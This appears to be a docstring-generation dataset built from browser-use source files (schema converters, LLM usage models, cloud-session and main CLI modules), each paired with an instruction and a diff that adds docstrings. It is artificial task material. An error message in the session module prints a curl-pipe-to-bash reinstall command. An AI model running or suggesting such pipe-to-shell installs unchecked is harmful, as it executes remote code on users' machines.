python_type = list[Any]
elif param_type == 'cookie':
python_type = str # Treat cookies as strings
# Check if parameter is required (defaults to True if not specified)
is_required = param.required if param.required is not None else True
# Make optional if not required
if not is_required:
python_type = python_type | None # type: ignore
# Create field with description
field_kwargs = {}
if param.description:
field_kwargs['description'] = param.description
if is_required:
fields[param.name] = (python_type, Field(**field_kwargs))
else:
fields[param.name] = (python_type, Field(default=None, **field_kwargs))
# Create and return the model
return create_model(model_name, __base__=BaseModel, **fields)
def convert_json_schema_to_pydantic(schema: dict[str, Any], model_name: str = 'SkillOutput') -> type[BaseModel]:
if not schema or 'properties' not in schema:
# Return empty model if no schema
return create_model(model_name, __base__=BaseModel)
fields: dict[str, Any] = {}
properties = schema.get('properties', {})
required_fields = set(schema.get('required', []))
for field_name, field_schema in properties.items():
# Get the field type
field_type_str = field_schema.get('type', 'string')
field_description = field_schema.get('description')
# Map JSON schema types to Python types
python_type: Any = str # default
if field_type_str == 'string':
python_type = str
elif field_type_str == 'number':
python_type = float
elif field_type_str == 'integer':
python_type = int
elif field_type_str == 'boolean':
python_type = bool
elif field_type_str == 'object':
python_type = dict[str, Any]
elif field_type_str == 'array':
# Check if items type is specified
items_schema = field_schema.get('items', {})
items_type = items_schema.get('type', 'string')
if items_type == 'string':
python_type = list[str]
elif items_type == 'number':
python_type = list[float]
elif items_type == 'integer':
python_type = list[int]
elif items_type == 'boolean':
python_type = list[bool]
elif items_type == 'object':
python_type = list[dict[str, Any]]
else:
python_type = list[Any]
# Make optional if not required
is_required = field_name in required_fields
if not is_required:
python_type = python_type | None # type: ignore
# Create field with description
field_kwargs = {}
if field_description:
field_kwargs['description'] = field_description
if is_required:
fields[field_name] = (python_type, Field(**field_kwargs))
else:
fields[field_name] = (python_type, Field(default=None, **field_kwargs))
# Create and return the model
return create_model(model_name, __base__=BaseModel, **fields) | --- +++ @@ -1,3 +1,4 @@+"""Utilities for skill schema conversion"""
from typing import Any
@@ -7,6 +8,15 @@
def convert_parameters_to_pydantic(parameters: list[ParameterSchema], model_name: str = 'SkillParameters') -> type[BaseModel]:
+ """Convert a list of ParameterSchema to a pydantic model for structured output
+
+ Args:
+ parameters: List of parameter schemas from the skill API
+ model_name: Name for the generated pydantic model
+
+ Returns:
+ A pydantic BaseModel class with fields matching the parameter schemas
+ """
if not parameters:
# Return empty model if no parameters
return create_model(model_name, __base__=BaseModel)
@@ -54,6 +64,19 @@
def convert_json_schema_to_pydantic(schema: dict[str, Any], model_name: str = 'SkillOutput') -> type[BaseModel]:
+ """Convert a JSON schema to a pydantic model
+
+ Args:
+ schema: JSON schema dictionary (OpenAPI/JSON Schema format)
+ model_name: Name for the generated pydantic model
+
+ Returns:
+ A pydantic BaseModel class matching the schema
+
+ Note:
+ This is a simplified converter that handles basic types.
+ For complex nested schemas, consider using datamodel-code-generator.
+ """
if not schema or 'properties' not in schema:
# Return empty model if no schema
return create_model(model_name, __base__=BaseModel)
@@ -114,4 +137,4 @@ fields[field_name] = (python_type, Field(default=None, **field_kwargs))
# Create and return the model
- return create_model(model_name, __base__=BaseModel, **fields)+ return create_model(model_name, __base__=BaseModel, **fields)
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/skills/utils.py |
Generate docstrings with examples | from typing import Generic, TypeVar, Union
from pydantic import BaseModel
T = TypeVar('T', bound=Union[BaseModel, str])
class ChatInvokeUsage(BaseModel):
prompt_tokens: int
"""The number of tokens in the prompt (this includes the cached tokens as well. When calculating the cost, subtract the cached tokens from the prompt tokens)"""
prompt_cached_tokens: int | None
"""The number of cached tokens."""
prompt_cache_creation_tokens: int | None
"""Anthropic only: The number of tokens used to create the cache."""
prompt_image_tokens: int | None
"""Google only: The number of tokens in the image (prompt tokens is the text tokens + image tokens in that case)"""
completion_tokens: int
"""The number of tokens in the completion."""
total_tokens: int
"""The total number of tokens in the response."""
class ChatInvokeCompletion(BaseModel, Generic[T]):
completion: T
"""The completion of the response."""
# Thinking stuff
thinking: str | None = None
redacted_thinking: str | None = None
usage: ChatInvokeUsage | None
"""The usage of the response."""
stop_reason: str | None = None
"""The reason the model stopped generating. Common values: 'end_turn', 'max_tokens', 'stop_sequence'.""" | --- +++ @@ -6,6 +6,9 @@
class ChatInvokeUsage(BaseModel):
+ """
+ Usage information for a chat model invocation.
+ """
prompt_tokens: int
"""The number of tokens in the prompt (this includes the cached tokens as well. When calculating the cost, subtract the cached tokens from the prompt tokens)"""
@@ -27,6 +30,9 @@
class ChatInvokeCompletion(BaseModel, Generic[T]):
+ """
+ Response from a chat model invocation.
+ """
completion: T
"""The completion of the response."""
@@ -39,4 +45,4 @@ """The usage of the response."""
stop_reason: str | None = None
- """The reason the model stopped generating. Common values: 'end_turn', 'max_tokens', 'stop_sequence'."""+ """The reason the model stopped generating. Common values: 'end_turn', 'max_tokens', 'stop_sequence'."""
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/llm/views.py |
Document classes and their methods |
import argparse
import json
import logging
import sys
from concurrent.futures import ThreadPoolExecutor, as_completed
from typing import Any
from browser_use_sdk.types.session_item_view import SessionItemView
from browser_use_sdk.types.session_view import SessionView
from browser_use_sdk.types.share_view import ShareView
from browser_use.skill_cli.commands.utils import format_duration, get_sdk_client
logger = logging.getLogger(__name__)
# ============ SDK Wrappers ============
def create_session(**kwargs: Any) -> SessionItemView:
# Map our param names to SDK param names
param_map = {
'proxy_country': 'proxy_country_code',
'screen_width': 'browser_screen_width',
'screen_height': 'browser_screen_height',
}
params = {}
for k, v in kwargs.items():
if v is not None:
params[param_map.get(k, k)] = v
return get_sdk_client().sessions.create_session(**params)
def list_sessions(limit: int = 10, status: str | None = None) -> list[SessionItemView]:
client = get_sdk_client()
response = client.sessions.list_sessions(
page_size=min(limit, 100),
filter_by=status,
)
return list(response.items) if response.items else []
def get_session(session_id: str) -> SessionView:
return get_sdk_client().sessions.get_session(session_id)
def stop_session(session_id: str) -> SessionView:
return get_sdk_client().sessions.update_session(session_id, action='stop')
def delete_session(session_id: str) -> None:
get_sdk_client().sessions.delete_session(session_id)
def create_public_share(session_id: str) -> ShareView:
return get_sdk_client().sessions.create_session_public_share(session_id)
def delete_public_share(session_id: str) -> None:
get_sdk_client().sessions.delete_session_public_share(session_id)
def stop_sessions_parallel(session_ids: list[str]) -> tuple[list[str], list[dict[str, Any]]]:
client = get_sdk_client()
stopped: list[str] = []
errors: list[dict[str, Any]] = []
def stop_one(sid: str) -> tuple[str, str | None]:
try:
client.sessions.update_session(sid, action='stop')
return (sid, None)
except Exception as e:
return (sid, str(e))
with ThreadPoolExecutor(max_workers=10) as executor:
futures = {executor.submit(stop_one, sid): sid for sid in session_ids}
for future in as_completed(futures):
sid, error = future.result()
if error:
errors.append({'id': sid, 'error': error})
else:
stopped.append(sid)
return stopped, errors
# ============ CLI Handlers ============
def handle_session_command(args: argparse.Namespace) -> int:
from browser_use.skill_cli.api_key import APIKeyRequired, require_api_key
from browser_use.skill_cli.install_config import is_mode_available
# Check if remote mode is available
if not is_mode_available('remote'):
print(
'Error: Session management requires remote mode.\n'
'Remote mode is not installed. Reinstall to enable:\n'
' curl -fsSL https://browser-use.com/cli/install.sh | bash -s -- --remote-only\n'
' curl -fsSL https://browser-use.com/cli/install.sh | bash -s -- --full',
file=sys.stderr,
)
return 1
# Check API key
try:
require_api_key('Cloud sessions')
except APIKeyRequired as e:
print(f'Error: {e}', file=sys.stderr)
return 1
if args.session_command == 'list':
return _handle_list(args)
elif args.session_command == 'get':
return _handle_get(args)
elif args.session_command == 'stop':
return _handle_stop(args)
elif args.session_command == 'create':
return _handle_create(args)
elif args.session_command == 'share':
return _handle_share(args)
else:
print('Usage: browser-use session <command>')
print('Commands: list, get <id>, stop <id>, create, share <id>')
return 1
# ============ CLI Helper Functions ============
def _session_to_dict(session: Any) -> dict[str, Any]:
return {
'id': session.id,
'status': session.status,
'liveUrl': session.live_url,
'startedAt': session.started_at.isoformat() if session.started_at else None,
'finishedAt': session.finished_at.isoformat() if session.finished_at else None,
'keepAlive': session.keep_alive,
'persistMemory': getattr(session, 'persist_memory', None),
'proxyCost': session.proxy_cost,
'publicShareUrl': getattr(session, 'public_share_url', None),
}
def _handle_list(args: argparse.Namespace) -> int:
try:
status_filter = getattr(args, 'status', None)
sessions = list_sessions(limit=args.limit, status=status_filter)
except Exception as e:
print(f'Error: {e}', file=sys.stderr)
return 1
if getattr(args, 'json', False):
print(json.dumps([_session_to_dict(s) for s in sessions]))
else:
if not sessions:
status_msg = f' with status "{status_filter}"' if status_filter else ''
print(f'No sessions found{status_msg}')
else:
header = f'Sessions ({len(sessions)})'
if status_filter:
header = f'{status_filter.capitalize()} sessions ({len(sessions)})'
print(f'{header}:')
for s in sessions:
session_id = s.id or 'unknown'
status = s.status or 'unknown'
live_url = s.live_url
started_at = s.started_at
finished_at = s.finished_at
keep_alive = '🔄' if s.keep_alive else ''
# Status emoji
status_emoji = {
'active': '🟢',
'stopped': '⏹️',
}.get(status, '❓')
# Truncate ID for display
short_id = session_id[:8] + '...' if len(session_id) > 8 else session_id
# Build line with duration
duration = format_duration(started_at, finished_at)
line = f' {status_emoji} {short_id} [{status}]'
if duration:
line += f' {duration}'
if keep_alive:
line += f' {keep_alive}'
if live_url and status == 'active':
line += f'\n live: {live_url}'
print(line)
return 0
def _handle_get(args: argparse.Namespace) -> int:
try:
session = get_session(args.session_id)
except Exception as e:
print(f'Error: {e}', file=sys.stderr)
return 1
if getattr(args, 'json', False):
print(json.dumps(_session_to_dict(session)))
else:
session_id = session.id or args.session_id
status = session.status or 'unknown'
live_url = session.live_url
started_at = session.started_at
finished_at = session.finished_at
keep_alive = session.keep_alive
proxy_cost = session.proxy_cost
public_share_url = getattr(session, 'public_share_url', None)
# Status emoji
status_emoji = {
'active': '🟢',
'stopped': '⏹️',
}.get(status, '❓')
# Build header with duration
duration = format_duration(started_at, finished_at)
header_parts = [f'{status_emoji} {session_id[:8]}... [{status}]']
if duration:
header_parts.append(duration)
if proxy_cost:
# Format proxy cost to 2 decimal places
try:
cost_val = float(proxy_cost)
header_parts.append(f'${cost_val:.2f}')
except (ValueError, TypeError):
header_parts.append(f'${proxy_cost}')
print(' '.join(header_parts))
if keep_alive:
print(' Keep Alive: Yes')
if live_url:
print(f' Live URL: {live_url}')
if public_share_url:
print(f' Public Share: {public_share_url}')
return 0
def _handle_stop(args: argparse.Namespace) -> int:
# Handle --all flag
if getattr(args, 'all', False):
return _handle_stop_all(args)
try:
stop_session(args.session_id)
except Exception as e:
print(f'Error: {e}', file=sys.stderr)
return 1
if getattr(args, 'json', False):
print(json.dumps({'stopped': args.session_id}))
else:
print(f'Stopped session: {args.session_id}')
return 0
def _handle_stop_all(args: argparse.Namespace) -> int:
try:
# Get all active sessions
sessions = list_sessions(limit=100, status='active')
except Exception as e:
print(f'Error listing sessions: {e}', file=sys.stderr)
return 1
if not sessions:
print('No active sessions to stop')
return 0
# Extract session IDs
session_ids = [s.id for s in sessions if s.id]
if not session_ids:
print('No active sessions to stop')
return 0
# Stop all sessions in parallel
stopped, errors = stop_sessions_parallel(session_ids)
if getattr(args, 'json', False):
print(json.dumps({'stopped': stopped, 'errors': errors}))
else:
if stopped:
print(f'Stopped {len(stopped)} session(s):')
for sid in stopped:
print(f' ✓ {sid[:8]}...')
if errors:
print(f'Failed to stop {len(errors)} session(s):')
for err in errors:
print(f' ✗ {err["id"][:8]}...: {err["error"]}')
return 0 if not errors else 1
def _handle_create(args: argparse.Namespace) -> int:
# Parse screen size if provided
screen_width = None
screen_height = None
if hasattr(args, 'screen_size') and args.screen_size:
try:
w, h = args.screen_size.lower().split('x')
screen_width = int(w)
screen_height = int(h)
except ValueError:
print('Error: Invalid screen size format. Use WxH (e.g., 1920x1080)', file=sys.stderr)
return 1
try:
session = create_session(
profile_id=getattr(args, 'profile', None),
proxy_country=getattr(args, 'proxy_country', None),
keep_alive=getattr(args, 'keep_alive', None),
persist_memory=getattr(args, 'persist_memory', None),
start_url=getattr(args, 'start_url', None),
screen_width=screen_width,
screen_height=screen_height,
)
except Exception as e:
print(f'Error: {e}', file=sys.stderr)
return 1
if getattr(args, 'json', False):
print(json.dumps(_session_to_dict(session)))
else:
print(f'Created session: {session.id}')
if session.live_url:
print(f' Live URL: {session.live_url}')
return 0
def _handle_share(args: argparse.Namespace) -> int:
session_id = args.session_id
# Delete share if requested
if getattr(args, 'delete', False):
try:
delete_public_share(session_id)
except Exception as e:
print(f'Error: {e}', file=sys.stderr)
return 1
if getattr(args, 'json', False):
print(json.dumps({'deleted': session_id}))
else:
print(f'Deleted public share for session: {session_id}')
return 0
# Create share
try:
share = create_public_share(session_id)
except Exception as e:
print(f'Error: {e}', file=sys.stderr)
return 1
if getattr(args, 'json', False):
print(
json.dumps(
{
'sessionId': session_id,
'url': share.share_url,
'shareToken': share.share_token,
'viewCount': share.view_count,
}
)
)
else:
print(f'Public share created for session: {session_id}')
if share.share_url:
print(f' URL: {share.share_url}')
return 0 | --- +++ @@ -1,3 +1,9 @@+"""Cloud session SDK wrappers and CLI handlers.
+
+This module provides:
+- SDK wrapper functions for the Browser-Use Cloud Session API
+- CLI command handlers for `browser-use session <command>`
+"""
import argparse
import json
@@ -19,6 +25,20 @@
def create_session(**kwargs: Any) -> SessionItemView:
+ """Create a cloud browser session.
+
+ Args:
+ profile_id: Cloud profile ID for persistent auth/cookies
+ proxy_country: Proxy country code (us, gb, de, etc.)
+ keep_alive: Keep session alive after task completes
+ persist_memory: Share memory between tasks in session
+ start_url: URL to navigate to when session starts
+ screen_width: Browser screen width in pixels
+ screen_height: Browser screen height in pixels
+
+ Returns:
+ SessionItemView with session details
+ """
# Map our param names to SDK param names
param_map = {
'proxy_country': 'proxy_country_code',
@@ -34,6 +54,7 @@
def list_sessions(limit: int = 10, status: str | None = None) -> list[SessionItemView]:
+ """List cloud browser sessions."""
client = get_sdk_client()
response = client.sessions.list_sessions(
page_size=min(limit, 100),
@@ -43,26 +64,32 @@
def get_session(session_id: str) -> SessionView:
+ """Get details of a specific session."""
return get_sdk_client().sessions.get_session(session_id)
def stop_session(session_id: str) -> SessionView:
+ """Stop a cloud session."""
return get_sdk_client().sessions.update_session(session_id, action='stop')
def delete_session(session_id: str) -> None:
+ """Delete a cloud session and all its tasks."""
get_sdk_client().sessions.delete_session(session_id)
def create_public_share(session_id: str) -> ShareView:
+ """Create a public share URL for a session."""
return get_sdk_client().sessions.create_session_public_share(session_id)
def delete_public_share(session_id: str) -> None:
+ """Delete the public share for a session."""
get_sdk_client().sessions.delete_session_public_share(session_id)
def stop_sessions_parallel(session_ids: list[str]) -> tuple[list[str], list[dict[str, Any]]]:
+ """Stop multiple cloud sessions in parallel."""
client = get_sdk_client()
stopped: list[str] = []
errors: list[dict[str, Any]] = []
@@ -90,6 +117,16 @@
def handle_session_command(args: argparse.Namespace) -> int:
+ """Handle session subcommands.
+
+ Session commands manage cloud sessions and always require the cloud API.
+
+ Args:
+ args: Parsed command-line arguments
+
+ Returns:
+ Exit code (0 for success, 1 for error)
+ """
from browser_use.skill_cli.api_key import APIKeyRequired, require_api_key
from browser_use.skill_cli.install_config import is_mode_available
@@ -131,6 +168,7 @@
def _session_to_dict(session: Any) -> dict[str, Any]:
+ """Convert SDK session object to dict for JSON output."""
return {
'id': session.id,
'status': session.status,
@@ -145,6 +183,7 @@
def _handle_list(args: argparse.Namespace) -> int:
+ """Handle 'session list' command."""
try:
status_filter = getattr(args, 'status', None)
sessions = list_sessions(limit=args.limit, status=status_filter)
@@ -195,6 +234,7 @@
def _handle_get(args: argparse.Namespace) -> int:
+ """Handle 'session get <session_id>' command."""
try:
session = get_session(args.session_id)
except Exception as e:
@@ -244,6 +284,7 @@
def _handle_stop(args: argparse.Namespace) -> int:
+ """Handle 'session stop <session_id>' command."""
# Handle --all flag
if getattr(args, 'all', False):
return _handle_stop_all(args)
@@ -263,6 +304,7 @@
def _handle_stop_all(args: argparse.Namespace) -> int:
+ """Handle 'session stop --all' command."""
try:
# Get all active sessions
sessions = list_sessions(limit=100, status='active')
@@ -300,6 +342,7 @@
def _handle_create(args: argparse.Namespace) -> int:
+ """Handle 'session create' command."""
# Parse screen size if provided
screen_width = None
screen_height = None
@@ -337,6 +380,7 @@
def _handle_share(args: argparse.Namespace) -> int:
+ """Handle 'session share <session_id>' command."""
session_id = args.session_id
# Delete share if requested
@@ -376,4 +420,4 @@ if share.share_url:
print(f' URL: {share.share_url}')
- return 0+ return 0
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/skill_cli/commands/cloud_session.py |
Generate docstrings with parameter types | #!/usr/bin/env python3
import argparse
import asyncio
import hashlib
import json
import os
import socket
import subprocess
import sys
import tempfile
import time
from pathlib import Path
# =============================================================================
# Early command interception (before heavy imports)
# These commands don't need the session server infrastructure
# =============================================================================
# Handle --mcp flag early to prevent logging initialization
if '--mcp' in sys.argv:
import logging
os.environ['BROWSER_USE_LOGGING_LEVEL'] = 'critical'
os.environ['BROWSER_USE_SETUP_LOGGING'] = 'false'
logging.disable(logging.CRITICAL)
import asyncio
from browser_use.mcp.server import main as mcp_main
asyncio.run(mcp_main())
sys.exit(0)
# Helper to find the subcommand (first non-flag argument)
def _get_subcommand() -> str | None:
for arg in sys.argv[1:]:
if not arg.startswith('-'):
return arg
return None
# Handle 'install' command - installs Chromium browser + system dependencies
if _get_subcommand() == 'install':
import platform
print('📦 Installing Chromium browser + system dependencies...')
print('⏳ This may take a few minutes...\n')
# Build command - only use --with-deps on Linux (it fails on Windows/macOS)
cmd = ['uvx', 'playwright', 'install', 'chromium']
if platform.system() == 'Linux':
cmd.append('--with-deps')
cmd.append('--no-shell')
result = subprocess.run(cmd)
if result.returncode == 0:
print('\n✅ Installation complete!')
print('🚀 Ready to use! Run: uvx browser-use')
else:
print('\n❌ Installation failed')
sys.exit(1)
sys.exit(0)
# Handle 'init' command - generate template files
# Uses _get_subcommand() to check if 'init' is the actual subcommand,
# not just anywhere in argv (prevents hijacking: browser-use run "init something")
if _get_subcommand() == 'init':
from browser_use.init_cmd import main as init_main
# Check if --template or -t flag is present without a value
# If so, just remove it and let init_main handle interactive mode
if '--template' in sys.argv or '-t' in sys.argv:
try:
template_idx = sys.argv.index('--template') if '--template' in sys.argv else sys.argv.index('-t')
template = sys.argv[template_idx + 1] if template_idx + 1 < len(sys.argv) else None
# If template is not provided or is another flag, remove the flag and use interactive mode
if not template or template.startswith('-'):
if '--template' in sys.argv:
sys.argv.remove('--template')
else:
sys.argv.remove('-t')
except (ValueError, IndexError):
pass
# Remove 'init' from sys.argv so click doesn't see it as an unexpected argument
sys.argv.remove('init')
init_main()
sys.exit(0)
# Handle --template flag directly (without 'init' subcommand)
# Delegate to init_main() which handles full template logic (directories, manifests, etc.)
if '--template' in sys.argv:
from browser_use.init_cmd import main as init_main
# Build clean argv for init_main: keep only init-relevant flags
new_argv = [sys.argv[0]] # program name
i = 1
while i < len(sys.argv):
arg = sys.argv[i]
# Keep --template/-t and its value
if arg in ('--template', '-t'):
new_argv.append(arg)
if i + 1 < len(sys.argv) and not sys.argv[i + 1].startswith('-'):
new_argv.append(sys.argv[i + 1])
i += 1
# Keep --output/-o and its value
elif arg in ('--output', '-o'):
new_argv.append(arg)
if i + 1 < len(sys.argv) and not sys.argv[i + 1].startswith('-'):
new_argv.append(sys.argv[i + 1])
i += 1
# Keep --force/-f and --list/-l flags
elif arg in ('--force', '-f', '--list', '-l'):
new_argv.append(arg)
# Skip other flags (--session, --browser, --headed, etc.)
i += 1
sys.argv = new_argv
init_main()
sys.exit(0)
# =============================================================================
# Utility functions (inlined to avoid imports)
# =============================================================================
def get_socket_path(session: str) -> str:
if sys.platform == 'win32':
# Use 127.0.0.1 explicitly (not localhost) to avoid IPv6 binding issues
port = 49152 + (int(hashlib.md5(session.encode()).hexdigest()[:4], 16) % 16383)
return f'tcp://127.0.0.1:{port}'
return str(Path(tempfile.gettempdir()) / f'browser-use-{session}.sock')
def get_pid_path(session: str) -> Path:
return Path(tempfile.gettempdir()) / f'browser-use-{session}.pid'
def _pid_exists(pid: int) -> bool:
if sys.platform == 'win32':
import ctypes
PROCESS_QUERY_LIMITED_INFORMATION = 0x1000
handle = ctypes.windll.kernel32.OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, False, pid)
if handle:
ctypes.windll.kernel32.CloseHandle(handle)
return True
return False
else:
try:
os.kill(pid, 0)
return True
except OSError:
return False
def is_server_running(session: str) -> bool:
pid_path = get_pid_path(session)
if not pid_path.exists():
return False
try:
pid = int(pid_path.read_text().strip())
return _pid_exists(pid)
except (OSError, ValueError):
# Can't read PID file or invalid PID
return False
def connect_to_server(session: str, timeout: float = 60.0) -> socket.socket:
sock_path = get_socket_path(session)
if sock_path.startswith('tcp://'):
# Windows: TCP connection
_, hostport = sock_path.split('://', 1)
host, port = hostport.split(':')
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(timeout)
sock.connect((host, int(port)))
else:
# Unix socket
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
sock.settimeout(timeout)
sock.connect(sock_path)
return sock
def get_session_metadata_path(session: str) -> Path:
return Path(tempfile.gettempdir()) / f'browser-use-{session}.meta'
def ensure_server(session: str, browser: str, headed: bool, profile: str | None, api_key: str | None) -> bool:
from browser_use.skill_cli.utils import is_session_locked, kill_orphaned_server
meta_path = get_session_metadata_path(session)
# Check if server is already running AND holding its lock (healthy server)
if is_server_running(session) and is_session_locked(session):
try:
sock = connect_to_server(session, timeout=0.5) # Increased from 0.1s
sock.close()
# Check browser mode matches existing session
if meta_path.exists():
try:
meta = json.loads(meta_path.read_text())
existing_mode = meta.get('browser_mode', 'chromium')
if existing_mode != browser:
# Only error if user explicitly requested 'remote' but session is local
# This prevents losing cloud features (live_url, etc.)
# The reverse case (requesting local but having remote) is fine -
# user still gets a working browser, just with more features
if browser == 'remote' and existing_mode != 'remote':
print(
f"Error: Session '{session}' is running with --browser {existing_mode}, "
f'but --browser remote was requested.\n\n'
f'Cloud browser features (live_url) require a remote session.\n\n'
f'Options:\n'
f' 1. Close and restart: browser-use close && browser-use --browser remote open <url>\n'
f' 2. Use different session: browser-use --browser remote --session other <command>\n'
f' 3. Use existing local browser: browser-use --browser {existing_mode} <command>',
file=sys.stderr,
)
sys.exit(1)
except (json.JSONDecodeError, OSError):
pass # Metadata file corrupt, ignore
return False # Already running with correct mode
except Exception:
pass # Server not responsive, continue to restart logic
# Kill any orphaned server (has PID file but no lock)
kill_orphaned_server(session)
# Build server command
cmd = [
sys.executable,
'-m',
'browser_use.skill_cli.server',
'--session',
session,
'--browser',
browser,
]
if headed:
cmd.append('--headed')
if profile:
cmd.extend(['--profile', profile])
# Set up environment
env = os.environ.copy()
if api_key:
env['BROWSER_USE_API_KEY'] = api_key
# Start server as background process
if sys.platform == 'win32':
# Windows: CREATE_NO_WINDOW prevents console window from appearing
# CREATE_NEW_PROCESS_GROUP allows the process to survive parent exit
subprocess.Popen(
cmd,
env=env,
creationflags=subprocess.CREATE_NEW_PROCESS_GROUP | subprocess.CREATE_NO_WINDOW,
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL,
)
else:
# Unix: use start_new_session
subprocess.Popen(
cmd,
env=env,
start_new_session=True,
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL,
)
# Wait for server to be ready (must have PID, lock, and responsive socket)
for _ in range(100): # 5 seconds max
if is_server_running(session) and is_session_locked(session):
try:
sock = connect_to_server(session, timeout=0.5)
sock.close()
# Write metadata file to track session config
meta_path.write_text(
json.dumps(
{
'browser_mode': browser,
'headed': headed,
'profile': profile,
}
)
)
return True
except Exception:
pass
time.sleep(0.05)
print('Error: Failed to start session server', file=sys.stderr)
sys.exit(1)
def send_command(session: str, action: str, params: dict) -> dict:
request = {
'id': f'r{int(time.time() * 1000000) % 1000000}',
'action': action,
'session': session,
'params': params,
}
sock = connect_to_server(session)
try:
# Send request
sock.sendall((json.dumps(request) + '\n').encode())
# Read response
data = b''
while not data.endswith(b'\n'):
chunk = sock.recv(4096)
if not chunk:
break
data += chunk
if not data:
return {'id': request['id'], 'success': False, 'error': 'No response from server'}
return json.loads(data.decode())
finally:
sock.close()
# =============================================================================
# CLI Commands
# =============================================================================
def build_parser() -> argparse.ArgumentParser:
# Import install config to get available modes and default
from browser_use.skill_cli.install_config import get_available_modes, get_default_mode
available_modes = get_available_modes()
default_mode = get_default_mode()
# Build epilog dynamically based on available modes
epilog_parts = []
if 'chromium' in available_modes or 'real' in available_modes:
epilog_parts.append("""Local Mode (default):
browser-use run "Fill the form" # Uses local browser + your API keys
browser-use run "task" --llm gpt-4o # Specify model (requires API key)
browser-use open https://example.com""")
if 'remote' in available_modes:
if 'chromium' in available_modes:
# Full install - show how to switch to remote
epilog_parts.append("""
Remote Mode (--browser remote):
browser-use -b remote run "task" # Cloud execution (US proxy default)
browser-use -b remote run "task" --llm gpt-4o # Specify cloud model
browser-use -b remote --profile <id> run "task" # Use cloud profile
browser-use -b remote run "task" --proxy-country gb # UK proxy
browser-use -b remote run "task" --session-id <id> # Reuse session
browser-use -b remote run "task" --wait # Wait for completion
Task Management:
browser-use task list # List recent cloud tasks
browser-use task status <task-id> # Check task status
browser-use task stop <task-id> # Stop running task""")
else:
# Remote-only install
epilog_parts.append("""
Examples:
browser-use run "task" # Cloud execution (US proxy default)
browser-use run "task" --llm gpt-4o # Specify model
browser-use --profile <id> run "task" # Use cloud profile
browser-use run "task" --proxy-country gb # UK proxy
browser-use run "task" --session-id <id> # Reuse existing session
browser-use run "task" --wait # Wait for completion
Task Management:
browser-use task list # List recent cloud tasks
browser-use task status <task-id> # Check task status
browser-use task stop <task-id> # Stop running task""")
epilog_parts.append("""
Setup:
browser-use install # Install Chromium browser
browser-use init # Generate template file""")
parser = argparse.ArgumentParser(
prog='browser-use',
description='Browser automation CLI for browser-use',
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog='\n'.join(epilog_parts),
)
# Global flags
parser.add_argument('--session', '-s', default='default', help='Session name (default: default)')
parser.add_argument(
'--browser',
'-b',
choices=available_modes,
default=default_mode,
help=f'Browser mode (available: {", ".join(available_modes)})',
)
parser.add_argument('--headed', action='store_true', help='Show browser window')
parser.add_argument('--profile', help='Browser profile (local name or cloud ID)')
parser.add_argument('--json', action='store_true', help='Output as JSON')
parser.add_argument('--api-key', help='Browser-Use API key')
parser.add_argument('--mcp', action='store_true', help='Run as MCP server (JSON-RPC via stdin/stdout)')
parser.add_argument('--template', help='Generate template file (use with --output for custom path)')
subparsers = parser.add_subparsers(dest='command', help='Command to execute')
# -------------------------------------------------------------------------
# Setup Commands (handled early, before argparse)
# -------------------------------------------------------------------------
# install
subparsers.add_parser('install', help='Install Chromium browser + system dependencies')
# init
p = subparsers.add_parser('init', help='Generate browser-use template file')
p.add_argument('--template', '-t', help='Template name (interactive if not specified)')
p.add_argument('--output', '-o', help='Output file path')
p.add_argument('--force', '-f', action='store_true', help='Overwrite existing files')
p.add_argument('--list', '-l', action='store_true', help='List available templates')
# setup
p = subparsers.add_parser('setup', help='Configure browser-use for first-time use')
p.add_argument('--mode', choices=['local', 'remote', 'full'], default='local', help='Setup mode (local/remote/full)')
p.add_argument('--api-key', help='Browser-Use API key')
p.add_argument('--yes', '-y', action='store_true', help='Skip interactive prompts')
# doctor
subparsers.add_parser('doctor', help='Check browser-use installation and dependencies')
# -------------------------------------------------------------------------
# Browser Control Commands
# -------------------------------------------------------------------------
# open <url>
p = subparsers.add_parser('open', help='Navigate to URL')
p.add_argument('url', help='URL to navigate to')
# click <index> OR click <x> <y>
p = subparsers.add_parser('click', help='Click element by index or coordinates (x y)')
p.add_argument('args', nargs='+', type=int, help='Element index OR x y coordinates')
# type <text>
p = subparsers.add_parser('type', help='Type text')
p.add_argument('text', help='Text to type')
# input <index> <text>
p = subparsers.add_parser('input', help='Type text into specific element')
p.add_argument('index', type=int, help='Element index')
p.add_argument('text', help='Text to type')
# scroll [up|down]
p = subparsers.add_parser('scroll', help='Scroll page')
p.add_argument('direction', nargs='?', default='down', choices=['up', 'down'], help='Scroll direction')
p.add_argument('--amount', type=int, default=500, help='Scroll amount in pixels')
# back
subparsers.add_parser('back', help='Go back in history')
# screenshot [path]
p = subparsers.add_parser('screenshot', help='Take screenshot')
p.add_argument('path', nargs='?', help='Save path (outputs base64 if not provided)')
p.add_argument('--full', action='store_true', help='Full page screenshot')
# state
subparsers.add_parser('state', help='Get browser state (URL, title, elements)')
# switch <tab>
p = subparsers.add_parser('switch', help='Switch to tab')
p.add_argument('tab', type=int, help='Tab index')
# close-tab [tab]
p = subparsers.add_parser('close-tab', help='Close tab')
p.add_argument('tab', type=int, nargs='?', help='Tab index (current if not specified)')
# keys <keys>
p = subparsers.add_parser('keys', help='Send keyboard keys')
p.add_argument('keys', help='Keys to send (e.g., "Enter", "Control+a")')
# select <index> <value>
p = subparsers.add_parser('select', help='Select dropdown option')
p.add_argument('index', type=int, help='Element index')
p.add_argument('value', help='Value to select')
# eval <js>
p = subparsers.add_parser('eval', help='Execute JavaScript')
p.add_argument('js', help='JavaScript code to execute')
# extract <query>
p = subparsers.add_parser('extract', help='Extract data using LLM')
p.add_argument('query', help='What to extract')
# hover <index>
p = subparsers.add_parser('hover', help='Hover over element')
p.add_argument('index', type=int, help='Element index')
# dblclick <index>
p = subparsers.add_parser('dblclick', help='Double-click element')
p.add_argument('index', type=int, help='Element index')
# rightclick <index>
p = subparsers.add_parser('rightclick', help='Right-click element')
p.add_argument('index', type=int, help='Element index')
# -------------------------------------------------------------------------
# Cookies Commands
# -------------------------------------------------------------------------
cookies_p = subparsers.add_parser('cookies', help='Cookie operations')
